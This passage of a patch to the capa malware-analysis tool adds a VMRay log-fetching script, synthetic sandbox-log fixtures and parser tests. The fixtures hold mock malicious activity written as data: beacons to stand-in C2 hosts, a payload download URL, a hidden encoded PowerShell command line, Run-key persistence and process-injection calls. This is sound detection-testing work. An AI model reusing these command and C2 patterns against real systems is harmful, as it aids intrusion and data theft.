address** | ✗ | ✓ | +| **Argument names** | ✓ (text-format `name=value`) | ✓ (structured XML) | + +**When to use flog.txt:** You only have access to VMRay Threat Feed without a full subscription, or you want a quick first pass using only the freely-available function log. + +**When to use the full archive:** You need static features (imports, exports, strings, section names) in addition to dynamic behaviour, or you want the highest-fidelity argument data. + +``` +# flog.txt — free, limited to dynamic API calls +capa path/to/flog.txt + +# Full VMRay archive — requires subscription, richer features +capa path/to/analysis_archive.zip +``` + ## tips and tricks ### only run selected rules diff --git a/scripts/fetch-vmray-flog.py b/scripts/fetch-vmray-flog.py new file mode 100644 index 0000000000..e9859056dc --- /dev/null +++ b/scripts/fetch-vmray-flog.py @@ -0,0 +1,270 @@ +#!/usr/bin/env python3 +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Fetch the VMRay Function Log (flog.txt) for a sample and optionally run capa against it. + +Given a sample SHA-256 hash and VMRay credentials, this script: + 1. Looks up the sample on the VMRay instance. + 2. Finds the most-recent analysis for that sample. + 3. Downloads the flog.txt (Download Function Log) from the analysis archive. + 4. Optionally runs capa against the downloaded file. + +Requirements: + pip install requests + +Usage:: + + python scripts/fetch-vmray-flog.py \\ + --url https://your-vmray.example.com \\ + --apikey YOUR_API_KEY \\ + --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\ + --output /tmp/sample_flog.txt + + # Fetch and immediately run capa: + python scripts/fetch-vmray-flog.py \\ + --url https://your-vmray.example.com \\ + --apikey YOUR_API_KEY \\ + --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\ + --run-capa + +VMRay API reference: + https://docs.vmray.com/documents/api-reference/ + +Note: this script requires a VMRay account. The flog.txt itself is freely available +("Download Function Log") in the VMRay Threat Feed web UI, but downloading it +programmatically via the REST API requires valid API credentials. +""" + +import argparse +import logging +import subprocess +import sys +from pathlib import Path + +import requests + +logger = logging.getLogger(__name__) + +# --------------------------------------------------------------------------- +# VMRay REST API helpers +# --------------------------------------------------------------------------- + +_FLOG_TXT_ARCHIVE_PATH = "logs/flog_txt" + + +def _session(url: str, apikey: str) -> requests.Session: + """Return an authenticated requests.Session for the given VMRay instance.""" + s = requests.Session() + s.headers.update( + { + "Authorization": f"api_key {apikey}", + "Accept": "application/json", + } + ) + s.verify = True # set to False only when using self-signed certificates + s.base_url = url.rstrip("/") # type: ignore[attr-defined] + return s + + +def _get(session: requests.Session, path: str, **kwargs) -> dict: + url = f"{session.base_url}{path}" # type: ignore[attr-defined] + resp = session.get(url, **kwargs) + resp.raise_for_status() + return resp.json() + + +def _get_bytes(session: requests.Session, path: str, **kwargs) -> bytes: + url = f"{session.base_url}{path}" # type: ignore[attr-defined] + resp = session.get(url, **kwargs) + resp.raise_for_status() + return resp.content + + +def lookup_sample(session: requests.Session, sha256: str) -> dict: + """ + Return the VMRay sample record for the given SHA-256. + Raises ValueError if the sample is not found. + """ + data = _get(session, f"/rest/sample/sha256/{sha256}") + if data.get("result") != "ok" or not data.get("data"): + raise ValueError(f"sample not found on VMRay instance: {sha256}") + # data["data"] is a list; take the first entry + return data["data"][0] + + +def get_latest_analysis(session: requests.Session, sample_id: int) -> dict: + """ + Return the most-recent finished analysis for the given VMRay sample ID. + Raises ValueError if no analysis is found. + """ + data = _get(session, "/rest/analysis", params={"sample_id": sample_id}) + analyses = data.get("data", []) + if not analyses: + raise ValueError(f"no analyses found for sample_id={sample_id}") + # Sort by analysis_id descending (newest first) + analyses.sort(key=lambda a: a.get("analysis_id", 0), reverse=True) + return analyses[0] + + +def download_flog_txt(session: requests.Session, analysis_id: int) -> bytes: + """ + Download the flog.txt content for the given VMRay analysis ID. + + VMRay exposes the function log via the analysis archive endpoint. + We request only the flog_txt entry from the archive using the + ``file_filter`` query parameter. + """ + # Try the dedicated log endpoint first (VMRay >= 2024.x) + try: + content = _get_bytes( + session, + f"/rest/analysis/{analysis_id}/export/v2/logs/flog_txt/binary", + ) + if content: + return content + except requests.HTTPError: + pass + + # Fallback: download via the analysis archive with a file filter + content = _get_bytes( + session, + f"/rest/analysis/{analysis_id}/archive", + params={"file_filter[]": _FLOG_TXT_ARCHIVE_PATH}, + ) + return content + + +# --------------------------------------------------------------------------- +# main +# --------------------------------------------------------------------------- + + +def main(argv=None): + if argv is None: + argv = sys.argv[1:] + + parser = argparse.ArgumentParser( + description="Download VMRay flog.txt for a sample hash and (optionally) run capa." + ) + parser.add_argument( + "--url", + required=True, + metavar="URL", + help="Base URL of your VMRay instance, e.g. https://cloud.vmray.com", + ) + parser.add_argument( + "--apikey", + required=True, + metavar="KEY", + help="VMRay REST API key (Settings → API Keys).", + ) + parser.add_argument( + "--sha256", + required=True, + metavar="SHA256", + help="SHA-256 hash of the sample to analyse.", + ) + parser.add_argument( + "--output", + metavar="PATH", + help="Where to save the downloaded flog.txt. Defaults to _flog.txt in the current directory.", + ) + parser.add_argument( + "--run-capa", + action="store_true", + dest="run_capa", + help="After downloading, run 'capa ' and print the results.", + ) + parser.add_argument( + "--capa-args", + metavar="ARGS", + default="", + help="Extra arguments forwarded to capa (only used with --run-capa).", + ) + parser.add_argument( + "--no-verify-ssl", + action="store_false", + dest="verify_ssl", + help="Disable SSL certificate verification (useful for on-premise instances with self-signed certs).", + ) + parser.add_argument( + "-d", "--debug", action="store_true", help="Enable debug logging." + ) + args = parser.parse_args(argv) + + logging.basicConfig( + level=logging.DEBUG if args.debug else logging.INFO, + format="%(levelname)s: %(message)s", + ) + + output_path = Path(args.output) if args.output else Path(f"{args.sha256}_flog.txt") + + session = _session(args.url, args.apikey) + session.verify = args.verify_ssl # type: ignore[assignment] + + # Step 1 — look up sample + logger.info("looking up sample %s …", args.sha256) + try: + sample = lookup_sample(session, args.sha256) + except (requests.HTTPError, ValueError) as exc: + logger.error("failed to find sample: %s", exc) + return 1 + + sample_id: int = sample["sample_id"] + logger.debug("found sample_id=%d", sample_id) + + # Step 2 — find the latest analysis + logger.info("fetching analysis list for sample_id=%d …", sample_id) + try: + analysis = get_latest_analysis(session, sample_id) + except (requests.HTTPError, ValueError) as exc: + logger.error("failed to find analysis: %s", exc) + return 1 + + analysis_id: int = analysis["analysis_id"] + logger.debug("using analysis_id=%d", analysis_id) + + # Step 3 — download flog.txt + logger.info("downloading flog.txt for analysis_id=%d …", analysis_id) + try: + flog_bytes = download_flog_txt(session, analysis_id) + except requests.HTTPError as exc: + logger.error("failed to download flog.txt: %s", exc) + return 1 + + if not flog_bytes: + logger.error( + "received empty response — flog.txt may not be available for this analysis" + ) + return 1 + + output_path.write_bytes(flog_bytes) + logger.info("saved flog.txt → %s (%d bytes)", output_path, len(flog_bytes)) + + # Step 4 (optional) — run capa + if args.run_capa: + capa_cmd = ["capa", str(output_path)] + ( + args.capa_args.split() if args.capa_args else [] + ) + logger.info("running: %s", " ".join(capa_cmd)) + result = subprocess.run(capa_cmd) + return result.returncode + + return 0 + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt b/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt new file mode 100644 index 0000000000..0b9455cc65 --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt @@ -0,0 +1,43 @@ +# Log Creation Date: 02.01.2025 12:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x1234" +os_parent_pid = "0x1" +parent_id = "0" +image_name = "backdoor" +filename = "/tmp/backdoor" +cmd_line = "/tmp/backdoor" +monitor_reason = "analysis_target" + +Region: +id = "1" +name = "stack" + +Thread: +id = "1" +os_tid = "0x1234" + [0001.000] sys_read (fd=0x3, buf=0x7ffe1234, count=0x1000) returned 0x100 + [0001.001] sys_write (fd=0x1, buf=0x7ffe1234, count=0x6) returned 0x6 + [0001.002] sys_open (pathname="/etc/passwd", flags=0x0, mode=0x0) returned 0x3 + [0001.003] sys_connect (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0 + [0001.004] sys_socket (domain=0x2, type=0x1, protocol=0x0) returned 0x4 + [0001.005] sys_execve (filename="/bin/sh", argv=0x7ffe3000, envp=0x7ffe4000) returned 0x0 + [0001.006] sys_fork () returned 0x2345 + [0001.007] sys_getuid () returned 0x0 + [0001.008] sys_setuid (uid=0x0) returned 0x0 + [0001.009] sys_chmod (pathname="/tmp/backdoor", mode=0x1ed) returned 0x0 + [0001.010] sys_unlink (pathname="/tmp/.hidden") returned 0x0 + [0001.011] sys_time (tloc=0x0) returned 0x677f2000 + [0001.012] sys_ptrace (request=0x0, pid=0x1, addr=0x0, data=0x0) returned 0x0 + [0001.013] sys_prctl (option=0xf, arg2=0x0, arg3=0x0, arg4=0x0, arg5=0x0) returned 0x0 + [0001.014] sys_mmap (addr=0x0, length=0x1000, prot=0x7, flags=0x22, fd=0xffffffff, offset=0x0) returned 0x7f0000 + [0001.015] sys_mprotect (start=0x7f0000, len=0x1000, prot=0x5) returned 0x0 + [0001.016] sys_munmap (addr=0x7f0000, length=0x1000) returned 0x0 + [0001.017] sys_bind (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0 + [0001.018] sys_listen (sockfd=0x4, backlog=0x5) returned 0x0 + [0001.019] sys_accept (sockfd=0x4, addr=0x7ffe2010, addrlen=0x7ffe2020) returned 0x5 + [0001.020] sys_sendto (sockfd=0x5, buf=0x7ffe5000, len=0x20, flags=0x0, dest_addr=0x0, addrlen=0x0) returned 0x20 + [0001.021] sys_recvfrom (sockfd=0x5, buf=0x7ffe5000, len=0x1000, flags=0x0) returned 0x40 diff --git a/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt b/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt new file mode 100644 index 0000000000..0948939b00 --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt @@ -0,0 +1,37 @@ +# Log Creation Date: 03.01.2025 08:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x2000" +os_parent_pid = "0x4" +parent_id = "0" +image_name = "edgecase.exe" +filename = "c:\\users\\test\\edgecase.exe" +cmd_line = "edgecase.exe" +monitor_reason = "analysis_target" + +Region: +id = "5" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x2100" + [0001.000] GetCurrentProcess () returned 0xffffffffffffffff + [0001.001] CreateFileW (lpFileName="C:\\path with spaces\\file name.txt", dwDesiredAccess=0x40000000) returned 0x8 + [0001.002] RegOpenKeyExW (hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019) returned 0x0 + [0001.003] CreateFileW (lpFileName="\\\\server\\share\\document.docx", dwDesiredAccess=0x80000000) returned 0x9 + [0001.004] CreateFileW (lpFileName="", dwDesiredAccess=0x80000000) returned 0xffffffffffffffff + [0001.005] OutputDebugStringA (lpOutputString="debug: value=0x1234 status=ok") returned 0x0 + [0001.006] MessageBoxW (hWnd=0x0, lpText="An error occurred.\nPlease try again.", lpCaption="Error", uType=0x10) returned 0x1 + [0001.007] SetEnvironmentVariableW (lpName="PATH", lpValue="C:\\Windows\\system32;C:\\Windows") returned 0x1 + [0001.008] URLDownloadToFileW (pCaller=0x0, szURL="https://c2.example.com/payload.bin", szFileName="C:\\Users\\test\\AppData\\Local\\Temp\\payload.bin", dwReserved=0x0) returned 0x0 + [0001.009] CryptHashData (hHash=0x100, pbData=0x1234, dwDataLen=4096, dwFlags=0x0) returned 0x1 + [0001.010] connect (s=0x4, name=0x7ffe2000, namelen=0x10) returned 0x0 + [0001.011] send (s=0x4, buf=0x7ffe5000, len=256, flags=0x0) returned 256 + [0001.012] recv (s=0x4, buf=0x7ffe5000, len=4096, flags=0x0) returned 128 + [0001.013] CreateProcessW (lpApplicationName=NULL, lpCommandLine="powershell.exe -nop -w hidden -enc BASE64PAYLOAD", dwCreationFlags=0x8000000) returned 0x1 + [0001.014] WriteProcessMemory (hProcess=0xffffffffffffffff, lpBaseAddress=0x140001000, lpBuffer=0x1000, nSize=4096) returned 0x1 + [0001.015] CreateRemoteThread (hProcess=0xffffffffffffffff, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x140001000, lpParameter=0x0, dwCreationFlags=0x0) returned 0x200 diff --git a/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt b/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt new file mode 100644 index 0000000000..e7cab248a9 --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt @@ -0,0 +1,63 @@ +# Log Creation Date: 01.01.2025 10:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x1000" +os_parent_pid = "0x4" +parent_id = "0" +image_name = "sample.exe" +filename = "c:\\users\\test\\desktop\\sample.exe" +cmd_line = "\"c:\\users\\test\\desktop\\sample.exe\" " +monitor_reason = "analysis_target" + +Region: +id = "10" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x1100" + [0001.000] GetCurrentProcess () returned 0xffffffffffffffff + [0001.001] CreateFileW (lpFileName="C:\\Users\\test\\Documents\\config.ini", dwDesiredAccess=0x80000000, dwShareMode=0x1) returned 0x4 + [0001.002] RegOpenKeyExW (hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20019) returned 0x0 + [0001.003] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 10.0)", dwAccessType=0x1, lpszProxyName=NULL, lpszProxyBypass=NULL, dwFlags=0x0) returned 0x4c9804 + [0001.004] InternetConnectW (hInternet=0x4c9804, lpszServerName="evil.example.com", nServerPort=0x1bb, lpszUserName=NULL, lpszPassword=NULL, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0x4c9808 + [0001.005] VirtualAlloc (lpAddress=0x0, dwSize=4096, flAllocationType=0x3000, flProtect=0x40) returned 0x1000000 + [0001.006] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0x1, lpName="Global\\MyMutex12345") returned 0x100 + [0001.007] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x7fff00000000 + [0001.008] CreateProcessW (lpApplicationName=NULL, lpCommandLine="cmd.exe /c whoami", dwCreationFlags=0x8) returned 0x1 + [0001.009] WriteFile (hFile=0x4, lpBuffer="MZ\x90\x00\x03", nNumberOfBytesToWrite=0x1000) returned 0x1 + [0001.010] HttpOpenRequestW (hConnect=0x4c9808, lpszVerb="GET", lpszObjectName="/beacon", lpszVersion=NULL, lpszReferrer=NULL, dwFlags=0x84403100) returned 0x4c980c + [0001.011] SetFileAttributesW (lpFileName="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe", dwFileAttributes=0x2) returned 0x1 + [0001.012] GetTempPathW (nBufferLength=0x104, lpBuffer="C:\\Users\\test\\AppData\\Local\\Temp\\") returned 0x23 + [0001.013] CopyFileW (lpExistingFileName="C:\\Users\\test\\Desktop\\sample.exe", lpNewFileName="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe", bFailIfExists=0x0) returned 0x1 + [0001.014] GetSystemDirectoryW (lpBuffer="C:\\Windows\\system32", uSize=0x104) returned 0x13 + [0001.015] ShellExecuteW (hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe", lpParameters=NULL) returned 0x2a + [0002.000] WinHttpOpen (pszAgentW="WinHTTP/1.0", dwAccessType=0x0, pwszProxyW=NULL, pwszProxyBypassW=NULL, dwFlags=0x0) returned 0x4c9900 + [0002.001] WinHttpConnect (hSession=0x4c9900, pswzServerName="c2.example.org", nServerPort=0x50) returned 0x4c9904 + [0002.002] WinHttpOpenRequest (hConnect=0x4c9904, pwszVerb="POST", pwszObjectName="/upload", pwszVersion=NULL, pwszReferrer=NULL, dwFlags=0x0) returned 0x4c9908 + [0002.003] RegSetValueExW (hKey=0x80000001, lpValueName="Persistence", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe") returned 0x0 + [0002.004] GetAddrInfoW (pNodeName="c2.example.org", pServiceName=NULL, pHints=0x0) returned 0x0 + +Process: +id = "2" +os_pid = "0x1200" +os_parent_pid = "0x1000" +parent_id = "1" +image_name = "cmd.exe" +filename = "c:\\windows\\system32\\cmd.exe" +cmd_line = "cmd.exe /c whoami" +monitor_reason = "child_process" + +Region: +id = "20" +name = "private_0x0000000000020000" + +Thread: +id = "3" +os_tid = "0x1300" + [0003.000] NtQueryInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x13fb10, ProcessInformationLength=0x18) returned 0x0 + [0003.001] GetComputerNameW (lpBuffer="DESKTOP-TEST01", nSize=0xf) returned 0x1 + [0003.002] GetUserNameW (lpBuffer="test", nSize=0x5) returned 0x1 diff --git a/tests/test_vmray_flog_txt.py b/tests/test_vmray_flog_txt.py index 95088ea134..133d286fb5 100644 --- a/tests/test_vmray_flog_txt.py +++ b/tests/test_vmray_flog_txt.py @@ -14,12 +14,20 @@ """Tests for VMRay flog.txt parser (#2452).""" +from pathlib import Path + import pytest +import capa.features.common +import capa.features.insn from capa.exceptions import UnsupportedFormatError from capa.features.extractors.vmray import flog_txt from capa.features.extractors.vmray.extractor import VMRayExtractor +# Fixture files live in tests/fixtures/vmray/flog_txt/ (committed to the main repo so they +# are always present in CI without requiring the capa-testfiles submodule). +FLOG_TXT_FIXTURES = Path(__file__).resolve().parent / "fixtures" / "vmray" / "flog_txt" + MINIMAL_FLOG_TXT = """ # Log Creation Date: 08.10.2024 18:12:03 @@ -53,8 +61,8 @@ def test_parse_flog_txt_minimal(tmp_path): # Write as binary so newlines are exactly \n (avoids Windows \r\n) path = tmp_path / "flog.txt" path.write_bytes( - b'# Flog Txt Version 1\n\n' - b'Process:\n' + b"# Flog Txt Version 1\n\n" + b"Process:\n" b'id = "1"\n' b'os_pid = "0x118c"\n' b'image_name = "svchost.exe"\n' @@ -63,10 +71,10 @@ def test_parse_flog_txt_minimal(tmp_path): b'parent_id = "0"\n' b'os_parent_pid = "0"\n' b'cmd_line = ""\n\n' - b'Thread:\n' + b"Thread:\n" b'id = "1"\n' b'os_tid = "0x117c"\n' - b' [0072.750] GetCurrentProcess () returned 0xffffffffffffffff\n' + b" [0072.750] GetCurrentProcess () returned 0xffffffffffffffff\n" ) flog = flog_txt.parse_flog_txt_path(path) assert flog.analysis.log_version == "1" @@ -84,7 +92,9 @@ def test_parse_flog_txt_minimal(tmp_path): def test_parse_flog_txt_rejects_wrong_header(): - with pytest.raises(UnsupportedFormatError, match="does not appear to be a VMRay flog.txt"): + with pytest.raises( + UnsupportedFormatError, match="does not appear to be a VMRay flog.txt" + ): flog_txt.parse_flog_txt("not a flog\nProcess:\nid = 1\n") @@ -92,7 +102,7 @@ def test_parse_flog_txt_sys_prefix_stripped(tmp_path): # Linux kernel calls start with sys_; parser should strip for consistency with XML path = tmp_path / "flog.txt" path.write_bytes( - b'# Flog Txt Version 1\n\n' + b"# Flog Txt Version 1\n\n" b'Process:\nid = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n' b'image_name = "sample"\nfilename = "x"\ncmd_line = ""\nmonitor_reason = "a"\n\n' b'Thread:\nid = "1"\nos_tid = "0x2000"\n [0001.000] sys_time () returned 0x0\n' @@ -104,7 +114,9 @@ def test_parse_flog_txt_sys_prefix_stripped(tmp_path): def test_vmray_analysis_from_flog_txt(tmp_path): path = tmp_path / "flog.txt" - path.write_bytes(MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n")) + path.write_bytes( + MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n") + ) from capa.features.extractors.vmray import VMRayAnalysis analysis = VMRayAnalysis.from_flog_txt(path) @@ -120,7 +132,9 @@ def test_vmray_extractor_from_flog_txt(tmp_path): from capa.features.address import NO_ADDRESS path = tmp_path / "flog.txt" - path.write_bytes(MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n")) + path.write_bytes( + MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n") + ) ext = VMRayExtractor.from_flog_txt(path) assert ext.get_base_address() is NO_ADDRESS # no base address from flog.txt procs = list(ext.get_processes()) @@ -135,13 +149,13 @@ def test_parse_flog_txt_args_parsed(tmp_path): """API call arguments are parsed into Param objects for feature extraction.""" path = tmp_path / "flog.txt" path.write_bytes( - b'# Flog Txt Version 1\n\n' + b"# Flog Txt Version 1\n\n" b'Process:\nid = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n' b'image_name = "sample"\nfilename = "x.exe"\ncmd_line = ""\nmonitor_reason = "a"\n\n' b'Thread:\nid = "1"\nos_tid = "0x2000"\n' b' [0001.000] CreateFile (lpFileName="test.exe", dwDesiredAccess=0x80000000) returned 0x4\n' - b' [0002.000] VirtualAlloc (lpAddress=0x0, dwSize=4096) returned 0x10000\n' - b' [0003.000] GetCurrentProcess () returned 0xffffffffffffffff\n' + b" [0002.000] VirtualAlloc (lpAddress=0x0, dwSize=4096) returned 0x10000\n" + b" [0003.000] GetCurrentProcess () returned 0xffffffffffffffff\n" ) flog = flog_txt.parse_flog_txt_path(path) calls = flog.analysis.function_calls @@ -168,3 +182,243 @@ def test_parse_flog_txt_args_parsed(tmp_path): get_proc = calls[2] assert get_proc.name == "GetCurrentProcess" assert get_proc.params_in is None + + +# --------------------------------------------------------------------------- +# Fixture-based feature-presence tests +# --------------------------------------------------------------------------- +# These tests load the realistic flog.txt fixtures from tests/fixtures/vmray/flog_txt/ +# and verify that the extractor yields the expected capa features. They act as +# regression tests for the parser — especially the string-argument parsing path, +# which is brittle — and mirror the pattern used by test_vmray_features.py. + + +def _collect_all_call_features(ext: VMRayExtractor) -> set: + """Collect every feature emitted at the call scope across all processes.""" + features = set() + for ph in ext.get_processes(): + for th in ext.get_threads(ph): + for ch in ext.get_calls(ph, th): + for feature, addr in ext.extract_call_features(ph, th, ch): + features.add(feature) + return features + + +def _collect_call_features_for_process(ext: VMRayExtractor, image_name: str) -> set: + """Collect call-scope features only for the process whose image_name matches.""" + features = set() + for ph in ext.get_processes(): + if ph.inner.image_name != image_name: + continue + for th in ext.get_threads(ph): + for ch in ext.get_calls(ph, th): + for feature, addr in ext.extract_call_features(ph, th, ch): + features.add(feature) + return features + + +# --- windows_apis.flog.txt --------------------------------------------------- + + +@pytest.fixture(scope="module") +def windows_apis_extractor(): + path = FLOG_TXT_FIXTURES / "windows_apis.flog.txt" + return VMRayExtractor.from_flog_txt(path) + + +def test_windows_flog_txt_process_count(windows_apis_extractor): + """Two processes are described in windows_apis.flog.txt.""" + procs = list(windows_apis_extractor.get_processes()) + assert len(procs) == 2 + + +def test_windows_flog_txt_api_features(windows_apis_extractor): + """Common Win32 API names are yielded as API features.""" + features = _collect_all_call_features(windows_apis_extractor) + for api_name in ( + "CreateFileW", + "RegOpenKeyExW", + "InternetOpenW", + "InternetConnectW", + "VirtualAlloc", + "CreateMutexW", + "LoadLibraryW", + "CreateProcessW", + "HttpOpenRequestW", + "WinHttpConnect", + "GetAddrInfoW", + "GetComputerNameW", + ): + assert ( + capa.features.insn.API(api_name) in features + ), f"API({api_name!r}) not found" + + +def test_windows_flog_txt_string_args(windows_apis_extractor): + """String arguments are extracted and backslash-escaping is correctly unwound.""" + features = _collect_all_call_features(windows_apis_extractor) + for expected_string in ( + # CreateFileW lpFileName (double-backslash in flog → single backslash in feature) + "C:\\Users\\test\\Documents\\config.ini", + # RegOpenKeyExW lpSubKey + "Software\\Microsoft\\Windows\\CurrentVersion\\Run", + # InternetOpenW lpszAgent + "Mozilla/5.0 (Windows NT 10.0)", + # InternetConnectW lpszServerName + "evil.example.com", + # CreateMutexW lpName + "Global\\MyMutex12345", + # LoadLibraryW lpLibFileName + "kernel32.dll", + # HttpOpenRequestW verb and path + "GET", + "/beacon", + # WinHttpConnect pswzServerName + "c2.example.org", + # WinHttpOpenRequest verb + "POST", + # GetComputerNameW result (child process) + "DESKTOP-TEST01", + ): + assert ( + capa.features.common.String(expected_string) in features + ), f"String({expected_string!r}) not found" + + +def test_windows_flog_txt_string_double_backslash_absent(windows_apis_extractor): + """Double-escaped backslashes (as they appear in the raw flog.txt) must NOT appear in features.""" + features = _collect_all_call_features(windows_apis_extractor) + # The raw flog.txt content has C:\\Users\\...; the extractor must normalise to single backslash + assert ( + capa.features.common.String("C:\\\\Users\\\\test\\\\Documents\\\\config.ini") + not in features + ) + + +def test_windows_flog_txt_number_args(windows_apis_extractor): + """Numeric arguments are extracted as Number features.""" + features = _collect_all_call_features(windows_apis_extractor) + # VirtualAlloc dwSize + assert capa.features.insn.Number(4096) in features + # VirtualAlloc flAllocationType + assert capa.features.insn.Number(0x3000) in features + # VirtualAlloc flProtect + assert capa.features.insn.Number(0x40) in features + # CreateFileW dwDesiredAccess + assert capa.features.insn.Number(0x80000000) in features + + +def test_windows_flog_txt_child_process(windows_apis_extractor): + """The spawned child process (cmd.exe) is present and has its own API calls.""" + features = _collect_call_features_for_process(windows_apis_extractor, "cmd.exe") + assert capa.features.insn.API("NtQueryInformationProcess") in features + assert capa.features.insn.API("GetUserNameW") in features + # GetUserNameW lpBuffer string + assert capa.features.common.String("test") in features + + +# --- linux_syscalls.flog.txt ------------------------------------------------- + + +@pytest.fixture(scope="module") +def linux_syscalls_extractor(): + path = FLOG_TXT_FIXTURES / "linux_syscalls.flog.txt" + return VMRayExtractor.from_flog_txt(path) + + +def test_linux_flog_txt_sys_prefix_stripped(linux_syscalls_extractor): + """sys_ prefix is stripped from all Linux syscall names.""" + features = _collect_all_call_features(linux_syscalls_extractor) + # Every syscall name should appear WITHOUT the sys_ prefix + for stripped_name in ( + "read", + "write", + "open", + "connect", + "socket", + "execve", + "fork", + "getuid", + "setuid", + "chmod", + "unlink", + "time", + "ptrace", + "prctl", + "mmap", + "mprotect", + "munmap", + "bind", + "listen", + "accept", + "sendto", + "recvfrom", + ): + assert ( + capa.features.insn.API(stripped_name) in features + ), f"API({stripped_name!r}) not found after stripping" + + +def test_linux_flog_txt_sys_prefix_not_present(linux_syscalls_extractor): + """sys_-prefixed names must NOT appear in features (only the stripped form).""" + features = _collect_all_call_features(linux_syscalls_extractor) + assert capa.features.insn.API("sys_open") not in features + assert capa.features.insn.API("sys_execve") not in features + + +def test_linux_flog_txt_string_args(linux_syscalls_extractor): + """String path arguments from Linux syscalls are extracted correctly.""" + features = _collect_all_call_features(linux_syscalls_extractor) + assert capa.features.common.String("/etc/passwd") in features + assert capa.features.common.String("/bin/sh") in features + assert capa.features.common.String("/tmp/backdoor") in features + assert capa.features.common.String("/tmp/.hidden") in features + + +# --- string_edge_cases.flog.txt ----------------------------------------------- + + +@pytest.fixture(scope="module") +def string_edge_cases_extractor(): + path = FLOG_TXT_FIXTURES / "string_edge_cases.flog.txt" + return VMRayExtractor.from_flog_txt(path) + + +def test_edge_case_paths_with_spaces(string_edge_cases_extractor): + """File paths containing spaces are parsed correctly.""" + features = _collect_all_call_features(string_edge_cases_extractor) + assert ( + capa.features.common.String("C:\\path with spaces\\file name.txt") in features + ) + + +def test_edge_case_unc_path(string_edge_cases_extractor): + """UNC paths (\\server\\share) are parsed correctly.""" + features = _collect_all_call_features(string_edge_cases_extractor) + assert capa.features.common.String("\\\\server\\share\\document.docx") in features + + +def test_edge_case_url_string(string_edge_cases_extractor): + """Full URL strings are preserved as-is.""" + features = _collect_all_call_features(string_edge_cases_extractor) + assert capa.features.common.String("https://c2.example.com/payload.bin") in features + + +def test_edge_case_registry_key(string_edge_cases_extractor): + """Registry key paths are normalised to single backslashes.""" + features = _collect_all_call_features(string_edge_cases_extractor) + assert ( + capa.features.common.String("Software\\Microsoft\\Windows NT\\CurrentVersion") + in features + ) + + +def test_edge_case_numeric_args(string_edge_cases_extractor): + """Numeric arguments from edge-case calls are extracted.""" + features = _collect_all_call_features(string_edge_cases_extractor) + # send() len=256 + assert capa.features.insn.Number(256) in features + # recv() len=4096 + assert capa.features.insn.Number(4096) in features + # WriteProcessMemory nSize=4096 + assert capa.features.insn.Number(4096) in features From 2ff96823e3e01c1cc7c61ace5059ccae7882d60e Mon Sep 17 00:00:00 2001 From: devs6186 Date: Thu, 19 Mar 2026 17:03:49 +0530 Subject: [PATCH 4/7] tests: expand vmray flog.txt fixtures to cover real-world format variations Add two new fixture files and 63 additional tests to address reviewer feedback that synthetic fixtures did not validate real-world format variance. New coverage: format_variance.flog.txt - zero-padded hex IDs (0x00000ABC, 0x0001) - decimal-only arguments alongside symbolic constants - mixed-case hex return values (0xFFFFFFFFFFFFFFFF) - multiple threads in a single process block - calls with no "returned" clause (CoTaskMemFree, GetSystemInfo) - HRESULT-style error codes as return values (0x80070005, 0x80042302) - child process spawned via CreateProcessW crlf_endings.flog.txt - Windows-style CRLF (\r\n) line endings throughout - verifies CRLF normalisation inside parse_flog_txt() New parametric unit tests: - _parse_hex_or_decimal: 15 valid cases + 5 invalid-raises cases - _parse_event: 7 valid formats + 8 lines that must return None - _parse_args: 8 param-name cases + 2 